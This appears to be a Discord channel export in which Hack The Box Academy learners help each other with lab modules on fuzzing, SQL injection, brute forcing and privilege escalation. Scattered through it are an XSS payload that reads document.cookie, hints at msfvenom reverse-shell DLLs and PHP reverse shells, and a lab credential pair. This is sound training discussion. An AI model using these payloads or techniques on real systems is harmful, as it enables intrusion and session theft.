#modules

1 messages · Page 512 of 1

livid pier
lethal atlas
#

@feral gyro it would be if you could connect. Maybe it's fixed now but I spent a day and a half fighting connection issues.

lethal atlas
#

Yes and my command was correct. It just would not connect from my vm or pwnbox. I was told they would fix the problem

feral gyro
lethal atlas
#

It would connect once every 8 to 10 tries

#

Yes sir.. hang on

#

┌──(kr0w㉿kali)-[~]
└─$ mysql -h 64.227.39.88 -P 31239 -u root -p
Enter password:
ERROR 2002 (HY000): Can't connect to server on '64.227.39.88' (115)

┌──(kr0w㉿kali)-[~]
└─$ mysql -h 139.59.175.51 -P 31040 -u root -p
Enter password:
ERROR 2002 (HY000): Can't connect to server on '139.59.175.51' (115)

┌──(kr0w㉿kali)-[~]
└─$ mysql -h 139.59.175.51 -P 31040 -u root -p
Enter password:
ERROR 2002 (HY000): Can't connect to server on '139.59.175.51' (115)

└─$ mysql -h 139.59.175.51 -P 31040 -u root -ppassword
ERROR 2002 (HY000): Can't connect to server on '139.59.175.51' (115)

feral gyro
lethal atlas
#

I gave up.

feral gyro
#

just u need to run systemctl restart mysqld

#

just run this

#

worked for me

lethal atlas
#

I've rebooted, and get the same error on 3 machines.

feral gyro
lethal atlas
#

Including theirs

feral gyro
#

i run this on my vm

lethal atlas
#

IF I decide to try it tomorrow I'll try it

feral gyro
lethal atlas
#

But the fact that I got the same error, on 3 completely different instances tells me the problem was on their end and not mine

lethal atlas
#

Oh I know I can. I actually have quite a bit of experience with mysql databases. Been using them for more than a decade at work.

#

I expected to cruise thru this and when it works I do.

feral gyro
#

cool

lethal atlas
#

well good, looks like it might be fixed.

feral gyro
livid pier
#

Maria Maria, she reminds me of the west side story

pulsar elm
#

SO first I have to: "sudo apt-get install libssl-dev" and then "add sudo to make "sudo ./configure && sudo make"

pulsar elm
#

Why hashid didn't worked?

rustic sage
pulsar elm
#

CRACKING PASSWORDS WITH HASHCAT - Cracking Miscellaneous Files & Hashes

rustic sage
pulsar elm
rustic sage
#

Yeah, + hashid hasn't been updated for 7 years soooo

pulsar elm
rustic sage
#

I don't know any more recent that does the same job yet, I only use the hashcat website and two others

#

https://www.tunnelsup.com/hash-analyzer/ & https://hashes.com/en/tools/hash_identifier if I need, but hashcat website is enough most of the time

pulsar elm
rustic sage
#

Yes only Hashcat (afaik) is capable of that

rustic sage
#

Only Hashcat can recognize the mode if I don't make any mistake

pulsar elm
#

the problem is that I have to insert the mode (-m) so... how can I discover it?

rustic sage
#

Or I just don't understand your request and I am dumb

pulsar elm
rustic sage
#

Anytime lovethebox

dusty timber
#

Im currently stuck at burp intruder. Here's the task:
"Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag."

Here's what I've done: Sent a GET with /§admin§/, I added the .html as payload and I successfully receive a 200. This is where im stuck, the .html returns 403 forbidden.

dusty timber
feral gyro
#

letme check

dusty timber
#

cheers

feral gyro
dusty timber
feral gyro
dusty timber
#

I only wrote .html and admin in there cause thats what I was looking for?

feral gyro
#

u need to use /seclists/Discovery/Web-Content/directory-list-2.3-small.txt

#

this list

#

as a payload

dusty timber
#

let me try

rustic sage
#

And change the request. /$admin$/ is wrong.

feral gyro
rustic sage
#

admin is static.

dusty timber
#

ah ok, thanks

feral gyro
#

burp will take so much time

rustic sage
#

something more like /admin/$file$.html

feral gyro
#

if u know ffuf then it will be cool

#

i don't recommend burp for this question

#

coz it will take hours

dusty timber
#

I dont know fuff yet, thats in a later part

#

But this is a burp exercise??

feral gyro
dusty timber
#

im just following the corriculum to learn it all, i dont know whats better. But I can imagine the wordlist search will take forever

dusty timber
#

Why would they make such a lengthy exercise when its brand new, just started burp lol

feral gyro
#

don't use that wordlist brother

#

stop it now although it is correct

feral gyro
#

ho i need to check this before

feral gyro
rustic sage
feral gyro
#

before

feral gyro
#

so u dir name will be like 2.html or 44.html something like this

#

so u need to craft a wordlist of numbers upto a given length and then start fuzzing

#

the correct one is in b/w 1 ---> 3000

dusty timber
#

This is a mess. Ok so I can use a wordlist with 1-3000 then?

dusty timber
#

ok so i found the numbers option

rustic sage
dusty timber
#

Im running it by numbers and not sure what to put as request. Trying /admin/§1§.html and then we'll see what happens

feral gyro
#

that's the reason why i used ffuf

rustic sage
feral gyro
#

idk if any other method exists

feral gyro
dusty timber
#

fuff im learning longer down the line lol

#

but this feels way too hard to be introduction to intruder 😦

rustic sage
#

Nah, it's simple

#

Really :)

dusty timber
#

im searching for 1.html, 2.html and so forth now up to 3k

#

its probably so simple im overlooking it then 😛

rustic sage
dusty timber
#

still not sure about the request though, what to write there

#

/admin/§§.html is what i have

dusty timber
rustic sage
#

This is a good exercise for Burp, but terrible for efficiency...

feral gyro
rustic sage
#

Still terrible for efficiency. Why paying for Pro if you can get it with ffuf for free :-P @feral gyro

dusty timber
#

Well if I get the request wrong I guess I have to do it all over. It feels wrong already

dusty timber
#

I want to look in the admin directory, but you say I cant use /§admin§/

rustic sage
dusty timber
#

/admin/§file§.html then file is replaced by the number in my wordlist?

feral gyro
dusty timber
feral gyro
#

try from 1500

dusty timber
#

Im good to try for myself a bit now, will do from 1500 as I had to redo it again. Thanks a lot for help! Been stuck here for hours

rustic sage
feral gyro
#

ffuf is better coz it is able to filter response codes

feral gyro
dusty timber
rustic sage
#

@dusty timber Looks great. Just double-check that your target machine is still up

#

Google to <ip>/index.html

dusty timber
#

I just reset it so it should be enough time now xD
Thanks again @rustic sage and @feral gyro

dusty timber
rustic sage
dusty timber
#

ah yea, so its working

#

IP:PORT/index.html returns blank page

rustic sage
#

Considering how slow it runs, even from 1500 seems exhausting...

#

You don't learn anything by waiting an hour for Burp...

dusty timber
#

yea im only at 1700 right now, so its a good dinner break

#

Agree!

rustic sage
#

Most platforms like HTB have a rule for box-creators, that a hashed password should get cracked within 5 minutes or so.

rustic sage
#

And if you would have used a regular directories wordlist, 100% sure your target would have timed out before you hit the answer. (line number in the 8000s)

dusty timber
#

Holy smokes

#

I am considering getting burp pro, just not yet, its "too soon", or it was until this exercise lol

#

Just to speed things up

rustic sage
#

Maybe for other kinds of tasks. There are excellent free tools for fuzzing.

lethal atlas
#

well I see sql injections is still not responding this morning. It pings until I try to connect then drops. At this rate I will finish the module next year.

#

same error as yesterday and the night before. ─$ mysql -h 64.227.39.88 -P 31108 -u root -p
Enter password:
ERROR 2002 (HY000): Can't connect to server on '64.227.39.88' (115)

feral gyro
#

try

lethal atlas
#

i have

#

that doesnt magically make the target start pinging

feral gyro
#

hoo it worked for me

#

i showed u

lethal atlas
#

and I am telling you I spawn the target, and I cannot ping it or connect

#

try it now

feral gyro
#

ho sorry on phone right now

lethal atlas
#

I have tried from pwnbox and a vm

feral gyro
#

mm

lethal atlas
#

I have rebooted, tried restarting the service, nothing works

feral gyro
#

send me a screenshot after u run this command systemctl restart mysqld

lethal atlas
#

┌──(kr0w㉿kali)-[~]
└─$ systemctl restart mysqld

┌──(kr0w㉿kali)-[~]
└─$ ping 64.227.39.88
PING 64.227.39.88 (64.227.39.88) 56(84) bytes of data.
^C
--- 64.227.39.88 ping statistics ---
3 packets transmitted, 0 received, 100% packet loss, time 2042ms

#

and pwnbox doesnt have that service

feral gyro
#

i wish i need to try it now

rustic sage
#

Which module is this?

#

@lethal atlas

lethal atlas
#

sql injections

rustic sage
#

Section?

lethal atlas
#

sql operators

#

The IP just does not respond

#

I tried to get help from staff yesterday but someone ( wont blast his name here) was rude and claimed it was fine until I showed him the error then he said they would fix it asap.

feral gyro
#

it's odd

feral gyro
#

at that time i found that command

lethal atlas
#

that command doesnt work on pwnbox

#

lol it finally connected. 14 tries

feral gyro
#

ho great

lethal atlas
#

never changed my command.

west canopy
#

@lethal atlas i fired up the sql injection module on my end cause i wanted to test , i'm also not able to connect to any target

rustic sage
#

Same here

lethal atlas
#

Thank you for trying. I knew I was not crazy. I legit had to keep trying over and over and over until it finally connects. Then I can finish a section and have to fight the next.

rustic sage
#

question. I've decided to run a vm on my laptop. Im running VMware player. I'm going trough the getting started module and I'm at the point where it has me set up encrypted LVM. I dont have this option. I downloaded the machine directly from ParrotSec. is this normal?

lethal atlas
#

I dont use parrot so I am not sure how the setup works for it. But I believe that having the LVM encrypted is a good security practice but not absolutely necessary .

livid pier
rustic sage
#

yea Im trying to but I don't have that option unfortunately the only options i have are these

lethal atlas
#

is it under advanced options?

rustic sage
#

no just recovery mode. i gonna redownload everything and see what happens. thanks for responding.

grand locust
#

Hey. Did you get any help with this?

lethal atlas
#

your code is incorrect.

lethal atlas
wanton dagger
lethal atlas
rich orbit
fierce musk
#

Read through the provided information carefully. Under the description of one of the tools it says it can be used to identify the type of CMS.

split sedge
#

why does this command not give any results?

autumn beacon
#

Do you get any output if you run it without the select?

split sedge
#

it rints out everything. thats the wierd par the tutorial shows to use the select cn

autumn beacon
#

Have you tried adding "-property *" to the Get-ADObject command?

split sedge
#

i have tried that and it would through a massive error.

but now the remote desktop is broken

split sedge
#

#613049811481919508 anyone able to explain to me how to find the userAccountControl value set to a specific flag? like i managed to get to the solution by accident but thats not the way to go about this and i would like to learn etc

#

i figured out it has to do with the bitmask but it doesnt make sense what i foudn to the solution and then the next question is completly different again 😮

fathom prairie
#

Module Web Requests
Section POST Method

Question: Login with the credentials (guest:guest), and try to get to the admin user from what you learned in this section and the previous section.

#

I need help trying to convert get an admin flag from the system

#

I tried editing the cookie to admin, admin_, admin_xxxx to try and get a response, but it always replied with

#

Welcome, guest_xxx

#

The replacements for the cookie I tried were decoded through Base64 into guest_xxxx, changed into one of the mentioned things, then recoded

#

^Nevermind, I was doing the right thing, it was the server that was down for like 40 minutes that was not working correctly

bleak vale
#

is there a reason gobuster is spamming me with progress? when i use it its like this long line of progress:..../..... (....%) makes it harder to read the reports

acoustic owl
rustic sage
#

.

lethal atlas
#

good morning fellow keyboard jockeys.

tidal compass
#

Morning sk. How ya be this fine morning?

lethal atlas
#

Little cold here but could be worse.

#

about to do a shit ton of server upgrades. yay me lol

#

26 to be exact

rich mulch
#

thank you for your hints. I finally got it ^^

tidal compass
twin raft
#

Someone can help me? , I'm on Login Brute Forcing module on the last part Brute Forcing services I'm stucked doing the lists

acoustic owl
wild hinge
#

Hi guys, on getting started module, public exploit section, I try to get the flag. I identified a well-known CMS running on port provided in the spawn link of question section in the form IP:port. I'm stuck with that. I can't find any related public exploit. Is there any other service I missed out?

acoustic owl
# twin raft One before

You have created a word list william.txt in the lesson "Personalized Wordlists". Try it with this list.

full jolt
wild hinge
lethal atlas
#

I have to say, for all the problems I had with the sql injection module, the skills assessment was kind of fun.

slow ruin
#

Having some trouble with Windows Privilege Escalation - DnsAdmins. I was able to add the netadm to Administrator but I am unable to cat the flag

west canopy
#

@slow ruin try using msfvenom to create a reverse shell .dll

#

I ran into the same problem

slow ruin
west canopy
#

yep 🙂

slow ruin
#

awesome thanks for the hint!!

west canopy
#

Anytime dawg!

urban walrus
#

Hmm, guys i'm doing HTB Academy - Web Requests module. Im in the "POST method" section. And i can't find the flag. Isn't the flag supposed to appear on screen, or in any of the HTTP responses/source code. I completed the challenge, but didn't recieve any flag.
Am i doing it right? I manipulated the cookie, got Admin...and no flags.

lethal atlas
urban walrus
#

I'll just repeat.

lethal atlas
#

I just tried it and for some reason it didnt work.

#

and I have detailed notes

urban walrus
#

So, i guess the problem's not with me...

lethal atlas
urban walrus
#

Hmm

#

Well, i'll try again and see if that helps.

lethal atlas
#

i used burp decoder to encode

urban walrus
#

I didn't use it.

rustic sage
#

If you used cli base64, then there is something to be careful about

urban walrus
#

Oh

#

okay...

#

No, i didn't use the cli here

rustic sage
#

when you echo, echo adds a line-break, which also gets encoded

urban walrus
#

no

#

that's not it

rustic sage
#

OK :)

urban walrus
#

yeah thx for the info tho

lethal atlas
urban walrus
#

I'll try alone, if i can't i will DM.

rustic sage
lethal atlas
#

@rustic sage that is really good info. Thanks. My notes must have been from CLI since I had a different value than Burp gives.

olive void
#

if i try to use sudo commands in the 'Linux Fundamentals' modules i need to use a password but what is this password i tryed my HTB acc password but that doesn't work pls help (:

rustic sage
#

@olive void There is a file with credentials on the desktop

#

credentials.txt or something like that

olive void
#

and password is in their?

rustic sage
#

There is only one way to found out

olive void
#

hhmmm i can't use Workstation bc i have no spawns left so i wil have to try tmr, thx 👍

lethal atlas
# olive void and password is in their?

If you are going to use pwnbox you will need to look in that file each time as it changes but I recommend setting up your own VM or workstation and using VPN

olive void
#

oo oke thx

urban walrus
#

Oh, well i just made a typo. That's why it didn't work

#

🤦‍♂️

slow bluff
#

Hi, Attacking common application Splunk > Enumerate the Splunk instance as an unauthenticated user. Submit the version number to move on (format 1.2.3) , this is really weird i cant get the version correct any help pls

slow bluff
livid pier
astral siren
#

in "intro to network traffic analysis" the exercises for "Packet Inception, Dissecting Network Traffic With Wireshark" are extremely broken. Using the pwnbox interface, the NoMachine client keeps getting disconnected. I was able to answer the first question with the downloadable files, but the second question about identifying the employee responsible seems to be impossible to do without the live instance

lethal atlas
astral siren
#

yeah, i was finally able to as well

#

there were a lot of things with that module that i felt were not good questions

jagged zenith
#

Hello

split sedge
#

anyone able to help me with Active Directory LDAP as in the skillz quizz i asks for the former employees OUbut when lisitng all OU it does not show?? am i missing something?

astral siren
#

is anyone else having issues with htb docker ip's? i seem to be unable to connect to the ip address given in an academy module

livid pier
#

Havent tried mods recently tho

astral siren
#

i've tried resetting the target, but that only works sometimes

#

ostensibly i know what i'm doing

#

oh well, i'm taking a break

lethal atlas
#

I need someone to help me with command Injections > Identifying Filters. The question asks which of the 3 is NOT Blacklisted, and in Burp I get a response using one of the three but when I try any of the 3 as an answer it says im wrong

west canopy
#

@lethal atlas DM me brah!

#

@split sedge DM me bro 🙂

frigid quail
#

Windows File Transfer Methods 2nd question i'm confused should i do the transfer from linux to windows, windows to windows, windows to linux , i tried the upload methods i thing there is something wrong with the urls

modest moth
#

im completely stumped on active subdomain enumeration. i have tried everything and cant seem to figure out question 2. I accidently fat fingered putting the right answer, but for some reason i can only find 1 name server. i have spent 2 days on this and it just makes no sense to me 😦 anyone help me out?

west canopy
#

@modest moth is this Information Gathering Web Edition?

modest moth
#

yessir

west canopy
#

Asking what the number of zones is right?

modest moth
#

yea the second question.

#

i got the answer right but it was an accident. i can dm to keep spoiler free

west canopy
#

Sure

livid pier
west canopy
#

🙂

#

Trying to get to your level bro!

hazy grotto
#

admin:ftp@dmin123

#

I'm working on the getting started module. im not sure why it's not connecting. im using ftp@dmin123 as the password

#

under service scanning section in getting started

west canopy
#

@hazy grotto i just took a look at it, the directions say to connect as the Bob user no?

hazy grotto
#

umm ok maybe this is where im confused

#

i went into ftp and pulled this login info admin:ftp@dmin123

west canopy
hazy grotto
#

i thoguht bob was just an example

west canopy
hazy grotto
#

i was following along and the username info was different

#

lol

#

ok checkmate

#

can you explain this file i found?

west canopy
#

Probably not, I did this module a while ago lol

hazy grotto
#

i get you are more than likely right. i just want to know why that file was in there and gave different info

west canopy
#

I think it might just be serving as an example

#

connect via anonymous ftp , and find file(s) that contain sensitive data

#

it's a somewhat common thing in CTF's , to find user credentials in one location and use them later on

hazy grotto
#

well i was able to get it. thank you jared

west canopy
#

anytime brother!

rustic root
#

Does anyone know if with the annual subscription you get any monthly cubes as well or you have to pay extra if you want to do any of the Tier III/IV modules?

lethal atlas
rustic root
#

Right, the annual subscription says it's the best deal but only says you get instant access to all up to Tier II but doesn't mention any monthly cubes

#

So I'm guessing for Tiers III and IV you still have to buy extra on top of the annual sub?

#

Or maybe it's better to just go with the monthly ones and get the monthly cubes...

lethal atlas
#

I guess I didn't look at annual.

#

Lol

#

But I have student account and get tier 2 for cheap

rustic root
raven cairn
#

I have student account. Do i get monthly cubes?

rustic root
#

Nice, yeah, I'm not a student so have to go full price, I really wanna get into it but the complexity of the pricing model is holding me back 😅

raven cairn
#

😭

livid pier
#

You get cubes when you complete the modules tho

lethal atlas
#

I don't see the advantage of yearly

livid pier
#

We should have enough for one 500 cube mod

lethal atlas
#

18 a month is 216

#

And you get all of tiers 0,1,and 2

#

Other than a test voucher.

#

But let's be honest, how many people are really ready for a test after just 1 year unless they have previous experience

livid pier
#

How hard is the test?

raven cairn
livid pier
#

Im thinking about lin privesc or bloodhound

lethal atlas
#

Lin and win priv esc sound good to me but I think if you finish all the others you might be serious enough about it to spend the extra. I mean, the test is not cheap.

livid pier
#

I think we might be the first graduation class of htb academy

#

I wonder if they will have a party for us

lethal atlas
#

Woohoo

#

Can't wait for the after party

#

I got the feeling Jared will do some shots

west canopy
#

I'm gonna be the stripper

raven cairn
west canopy
#

you can tip me in cubes

spiral quiver
#

hey i ran into a problem in oopsie starting point ......i ahve to upload a php reverse shell in webpage...i have no clue how to do it ...no explanation in the walkthrough either ...can someone help me?

untold kiln
tight glen
spiral quiver
#

okay

#

thank you

mortal basin
#

@here we will be taking the module 'Web Requests' offline for the next 30 minutes, as we will be releasing version 2.0 of the module.

twin gulch
#

Hey guys, can someone help me at brute force “skills assessment - website” module?

twin gulch
#

Sent ya pm

mortal basin
#

@here The version 2.0 of the Web Requests module has been released, with entirely new content.
If you have fully/partially completed the module previously, you will not lose your progress, but you may still find it interesting and beneficial if you decide to take the new module.
The module is a 'tier 0' module, so anyone may take for free.

lethal atlas
mortal basin
lethal atlas
#

It was mainly in the SQL injections section. Took me 2 days to get thru it. The skills assessment section didnt give me any issues though.

#

AND, btw I loved the skills assessment.

blissful verge
#

we have some big things the works that are taking precedence right now but we are working through updates to many of the older modules (File Inclusion, Hashcat, Linux Priv Esc, BloodHound, etc.) We are committed to quality content and an enjoyable learning experience for all on our platform and we are constantly evolving, improving, enhancing our procedures. we value each of our students and your opinions greatly as the platform would not exist without your support so always feel free to reach out to any of our team or to me directly with feedback, bugs, errors, requests, etc. know that we do read and discuss every bit of feedback we receive through various mediums and the best is yet to come!

mortal basin
lethal atlas
#

I just want the entire Hackthebox team to know that your hard work is appreciated. I have tried other platforms to learn and Academy is by FAR the best imho. I have enjoyed the modules, even with the occasional issues and feel that the method employed has helped me to understand and build. Keep up the good work and forgive an old grumpy guy like me who gets frustrated from time to time. 😄

blissful verge
lethal atlas
blissful verge
#

oh then you win. I'm 36. crazy I've been doing some sort of IT work for half my life now

lethal atlas
#

Same. I got into wireless internet in 1999 and have worked for ISP's up until 2 years ago. I got too old to climb towers so I took a desk job doing IT for a small college. I have always wanted to be in net sec so I started trying to learn. Glad I found HTB.

blissful verge
#

wow that's an awesome journey. I started out in a small office doing stuff like crawling under people's desks to install UPS devices, upgrading ram and OSs etc

lethal atlas
rustic sage
#

hello i need some help

#

i am on module getting started on the section knowledge check

#

i am using gobuster to find extensions of the ip

#

but i cant load the main website

#

should it look like this?

west canopy
#

Yes it appears the page is loading properly. If you are just fuzzing for files/directories then it really shouldn't matter what the page "looks like" if that makes sense

rustic sage
#

ok

#

i have stuck and i dont know what should i do now

west canopy
#

that "lorem ipsum" is just placeholder text used for websites

rustic sage
#

before the host was /nibbleblog but i cant find something now

#

@west canopy do you know what should i do now?

west canopy
#

Gimme a sec ill take a look at it on my end

rustic sage
#

i tried to reach them but i didnt find something usefull

west canopy
#

What section is this?

rustic sage
#

knowledge check

lethal atlas
#

under whats next

rustic sage
#

the last one

west canopy
#

ok i see it

#

i did this a while ago and didn't take any notes. I think i ended up using metasploit on this section

rustic sage
#

ok because i have to do with my classmates some homework

#

i will be back at 9

lethal atlas
west canopy
#

I take crazy detailed notes now

lethal atlas
#

same bro

#

have cherrytree all pimped out lol

west canopy
#

your cherry tree has a gold chain

lethal atlas
#

and tooth

west canopy
#

lol

#

@rustic sage just sent you a DM showing what to do brother 🙂

dry girder
#

Hello, doing the Getting Started module and im currently on Public Exploits. When I spawn the target box and run nmap on it I get "host seems down". What should I do?

west canopy
#

@dry girder try adding the -Pn option

lethal atlas
#

"nmap -h" -Pn tests all ports as open regardless

dry girder
#

Thank you @west canopy @lethal atlas

west canopy
#

Yea i think nmap typically tries to ping the target first before sending its probes, -Pn disables host ping

dry girder
#

and is it normal if it takes a lot of time. The last box I ran nmap with -sV and -sC flags was done really fast. I tried running without the flags (only with -Pn) but got nothing useful just that the ports are in ignored state

west canopy
#

Yes when you use -Pn , nmap actually tells you that "All addresses will be marked up and scan times will be slower"

lethal atlas
#

man I just looked at my notes on getting started. Or should I say complete lack thereof

west canopy
lethal atlas
#

I might have to go back and do it again

livid pier
#

You guys ready for the new easy box to drop tomorrow?

west canopy
#

my body is ready

lethal atlas
#

If I wasn't super busy tomorrow I would be

#

just finished helping someone with that Brute Forcing module. Thats VivisGhosts favorite

nocturne pendant
#

have you considered adding a module about hardware?

slow bluff
#

ls

livid pier
#

whoami

#

<script>alert(‘xss’)</script>

twin raft
#

Hi community, I'm taking Broken Authentication, weak Bruteforce protections, second question

#

Some help?

livid pier
#

@surreal rain sketch

surreal rain
#

Thanks

distant cradle
#

Module --> WEB REQUESTS
Section->> PUT & DELETE
If you go down to the PUT section, there is a typo, it is repeated twice:
nosoybek@htb[/htb]$ curl -s nosoybek@htb[/htb]$ curl -s http://<SERVER_IP>:<PORT>/api.php/city/New_HTB_City | jq

[
{
"city_name": "New_HTB_City",
"country_name": "HTB"
}
]

#

@HTB Academy

rustic sage
#

Hello

#

i am having some problems

#

i am on module :ATTACKING WEB APPLICATIONS WITH FFUF

#

i should get something like this

#

but i get:

feral gyro
rustic sage
#

i am on : sub-domain fuzzing

feral gyro
rustic sage
#

kk i am holding

feral gyro
rustic sage
#

let me restart the machine again

#

is this what you typed : ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.hackthebox.eu/ ?

#

@feral gyro

rustic sage
#

yea what did you typed?

feral gyro
rustic sage
#

ok let me see

feral gyro
#

-fs 403

rustic sage
#

can you type me the command that you used

#

@feral gyro bro

#

anyone else?

astral siren
#

I seem to be missing something in the "hacking wordpress" module. in the skills assessment, the question "Submit the contents of the flag file in the directory with directory listing enabled." i found two places where directory listing is enabled, but no flag file

#

nvm

#

too far in rabbit hole

feral gyro
#

not the spawned one

lethal atlas
#

where does it say that?

feral gyro
#

on the ffuf module

lethal atlas
#

I know, and nowhere does it say https

#
  1. HackTheBox has an online Swag Shop. Try running a sub-domain fuzzing test on 'hackthebox.eu' to find it. What is the full domain of it?
feral gyro
lethal atlas
#

although it works either way

#

I just ran with both and got the answer

feral gyro
#

is it http on https

#

or it is changing automatically

lethal atlas
#

it changes it automatically but it doesnt matter.

feral gyro
lethal atlas
#

and https

feral gyro
lethal atlas
#

I just know that sometimes trying http or https over the other works.

#

I guess I should read closer. I thought you were the one having the issue. lol

lethal atlas
lethal atlas
#

well if everyone is doing good I am gonna go finish Command Injections

acoustic owl
rustic sage
#

need some help with Login Brute Forcing skills assessment-website. i got the first flag and im trying to brute force the admin login form. having some trouble getting results. I think i might be messing up the fail string because i get a bunch of user name and password matches.

west canopy
#

@rustic sage feel free to DM me 🙂

opal vapor
#

Short question in the Linux modules. Has anyone any idea how I can look for that? I tried with apt list and than I pipped it in to wc but than seems to not working

west canopy
#

@opal vapor try doing something like: dpkg -l | grep -c 'ii'

dense wolf
#

im having problems

#

with a module

#

on htb

west canopy
#

Which module?

modest moth
#

Hi all, i am in the information gathering module and i am currently on the virtual host portion.

At the assesment part it says "vHosts needed for these questions"

Do i point the ipaddress that is spawned to www.inlanefreight.htb in /etc/hosts

west canopy
#

@modest moth yes, once you discover a vhost you will need to add it to /etc/hosts in order to navigate to it in your browser

astral siren
#

i'm having some trouble getting the reverse shell to run from "Attacking Common Applications" under "attacking splunk"

#

i edited the script that was provided to put my own ip/port in, but i'm not getting any connections back

#

ugh..nvm. i'm just an idiot

nocturne pendant
#

we all are

#

once a day

rustic sage
#

guys

#

can i ask you something

#

i am on module : File Inclusion / Directory Traversal

hazy grotto
#

Getting started module:
Web Enumeration

I was given a IP Address with 64.227.39.89:30672 I went through the whole module with it working up until the Certificates part and it asks this.

Certificates

SSL/TLS certificates are another potentially valuable source of information if HTTPS is in use. Browsing to https://10.10.10.121/ and viewing the certificate reveals the details below, including the email address and company name. These could potentially be used to conduct a phishing attack if this is within the scope of an assessment.

This is a different IP address than the given target and is doesn't work when i use the link above. When i enter the IP address of my target ip https://64.227.39.89:30672/ it just times out from loading. Same thing when I try https://64.227.39.89/ taking off the last 5 digits.

When i ping : ping 64.227.39.89
PING 64.227.39.89 (64.227.39.89) 56(84) bytes of data.

I only get on ping back and nothing in return

rustic sage
#

on the section: Local File Inclusion

hazy grotto
#

or a repeating ping

#

Can anyone steer me?

rustic sage
#

i just finished getting started

#

what do you need?

hazy grotto
#

I'm trying to view the certificate like in the module but it times out

rustic sage
#

are you using vm?

hazy grotto
#

pwnbox on this website

rustic sage
#

oh ok

#

what is the question ?

hazy grotto
#

Why can't i view the certifcate

#

and under the robots.txt section. I try navigating to the /private url and i never get anything

#

idk what im doing wrong

rustic sage
#

whats do you have to do send me a screenshot

hazy grotto
rustic sage
#

did you tried to restart the target and your pwnbox?

#

which section are you on?

#

@hazy grotto

hazy grotto
#

Certificates

SSL/TLS certificates are another potentially valuable source of information if HTTPS is in use. Browsing to https://10.10.10.121/ and viewing the certificate reveals the details below, including the email address and company name. These could potentially be used to conduct a phishing attack if this is within the scope of an assessment.

#

Web Enumeration

#

First web enum, scroll down to Certificates

rustic sage
#

ok

#

let me see

hazy grotto
#

I tried twice 2 hours ago and now again.

#

Idk if its because Im not understanding something but i was following along step by step

rustic sage
#

which command are you using?

hazy grotto
#

I'm trying to enter the IP into the URL

rustic sage
#

https://<target_ip>/

#

this ?

hazy grotto
#

yes

rustic sage
#

and send me a pic of your result

hazy grotto
#

Certificates

SSL/TLS certificates are another potentially valuable source of information if HTTPS is in use. Browsing to https://10.10.10.121/ and viewing the certificate reveals the details below, including the email address and company name. These could potentially be used to conduct a phishing attack if this is within the scope of an assessment.

This is a different IP address than the given target and is doesn't work when i use the link above. When i enter the IP address of my target ip https://64.227.39.89:30672/ it just times out from loading. Same thing when I try https://64.227.39.89/ taking off the last 5 digits.

When i ping : ping 64.227.39.89
PING 64.227.39.89 (64.227.39.89) 56(84) bytes of data.

I only get on ping back and nothing in return

rustic sage
#

send me a screenshot bro

hazy grotto
rustic sage
#

try whatweb <ip>

#

basically to lead to the question you dont need to go to certificate page

west canopy
#

@hazy grotto I believe they are talking about the SSL/TLS Certificate as just an extra tidbit of information.

hazy grotto
rustic sage
#

oh good

#

can try to move to the next one?

hazy grotto
west canopy
#

It's not an HTTPS website so there is no certificate

hazy grotto
#

lol

#

jared

#

i think i owe you a frosty drink

#

because im stupid

raven cairn
#

Pleaaaaaaaaase

west canopy
#

@raven cairn GET YOUR OWN FROSTIE

hazy grotto
raven cairn
#

😭NOOOOOOOOO!!!!

hazy grotto
hazy grotto
raven cairn
#

Is frosty alcohol?

hazy grotto
#

soda pop

raven cairn
#

I thought is was the thing at wendy’s 😋

hazy grotto
#

lol

#

frosty means cold

#

but i know what you are talking about

#

Dairy Queen for ice

west canopy
#

Dairy queen has the best ice cream ever

#

i dont know what chemicals they use , but i want more of them

hazy grotto
hazy grotto
#

You guys think this is timing you because of my slow internet?

west canopy
#

Try adding the port to the URL in your gobuster scan

hazy grotto
#

nvm i had done that jared

#

then took the port off

#

got a fourth ip and it's working now. with the port like you said

hazy grotto
west canopy
#

sure

astral siren
#

could you point me in the right direction?

Well I managed to find the right piece of the puzzle, but it was dumb luck. I don't understand why a file even existed at that directory

round lagoon
#

So the Firewall & IDS/IPS Evasion: Medium Lab is giving me a headache. I don't think to get the DNS service requires using nmap as sudo right?

west canopy
#

@round lagoon DM me if you need a nudge 🙂

rustic sage
#

hey anyone online not busy that can help with login brute forcing? having some issues with ssh

rustic sage
#

nvm im blind.

floral scroll
#

Anyone mind providing some guidance on Getting Started > Public Exploits? I've worked it all the way to setting up the exploit in MS

rustic sage
#

finally done with the login brute forcing module!!!

west canopy
#

Nice work 🙂

rustic sage
#

thanks. took me longer that care to admit but im glad i stuck with it. Thanks for the help @west canopy

west canopy
#

@floral scroll feel free to DM me bud!

acoustic owl
modest moth
#

Hi all any help on the getting started module knowledge check?

I found the version of the content management system but i dont know what to set the things to in metasploit. I know Rhosts is set to the target IP however, i dont know what to set the TARGETURI to, please nudge me or hint me as to what to set that to. im trying to gain an initial meterpreter session.

west canopy
#

@modest moth this is the GetSimpleCMS right?

#

I believe you can leave the TargetURI as default

modest moth
#

alright thanks, will try it out

#

@west canopy thanks again! guess i was doign everything right i just was stressing over the URI haha. will try to do the exploit without the metasploit now.

tardy cloak
#

Doing the footprinting module and need sudo to be able to run mount for NFS but don't know where to find the pwnbox password to run sudo - anyone know?

tardy cloak
#

Thanks 🙂

rustic sage
#

little confused on how i do the "connect to htb" i selected the pwnbox option it loads for a few seconds and still says offline

acoustic owl
#

Are you a subscriber.
If not, you can have only one pwn box per day.

rustic sage
#

hi to all/ Who can help me with module Cross-Site Scripting (XSS) - 'Try to use XSS to get the cookie value in the above page' I can't figure out what the link should look like. There is no example in the module itself, there is only a phrase that the task is similar to the previous module. But I don't have enough knowledge.

#

this is pyload - #"><img src=/ onerror=alert(document.cookie)>

#

How to insert it into the link? I'm not familiar with the syntax at all

opal vapor
#

Can someone give me a hint. I have tried out ls -al /var/log and top | grep ProFTPdbut that dosen't worked.

opal vapor
rustic sage
azure monolith
#

Anyone tell me how i start learn hacking

feral gyro
earnest juniper
#

Hii

raven cairn
raven cairn
#

I would highly recommend Linux fundamentals if you are not comfortable in a linux terminal

raven cairn
#

@azure monolith If you try a question and get stuck for a bit, we can help you out over here 😁

blissful verge
#

@azure monolith I’d recommend Linux Fundamentals and then practice Linux terminal skills using OvertheWire war games, starting with Bandit: https://overthewire.org/wargames/

cobalt rose
#

Hello people, I am having trouble with Firefox, it not be the right place to discuss but please help me. I have tried most of the commands, seen videos, nothing is helping.

west canopy
